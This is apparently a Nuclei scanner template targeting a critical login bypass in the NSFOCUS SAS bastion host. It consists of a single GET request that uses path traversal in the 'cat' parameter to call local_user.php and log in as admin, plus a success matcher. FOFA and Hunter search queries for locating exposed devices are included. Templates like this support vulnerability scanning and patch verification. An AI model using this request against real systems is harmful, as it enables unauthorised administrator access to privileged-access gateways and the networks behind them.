id: Nsfocus-SAS-login-bypass-local_user

info:
  name: Nsfocus-SAS-login-bypass-local_user
  author: p1z 
  severity: critical
  description: |
     绿盟堡垒机local_user.php存在登录绕过
  reference:
    https://mp.weixin.qq.com/s/qHPo0noFTvJoEcor00qtDg
  metadata:
    fofa-query: title=="NSFOCUS&nbsp;SAS[H]"
    hunter-query: app.name="NSFOCUS 绿盟 SAS"
    verified: true
  tags: 2023,Nsfocus,SAS,login-bypass


requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin"

    matchers:
      - type: word
        part: body
        words:
          - '{"status":200}'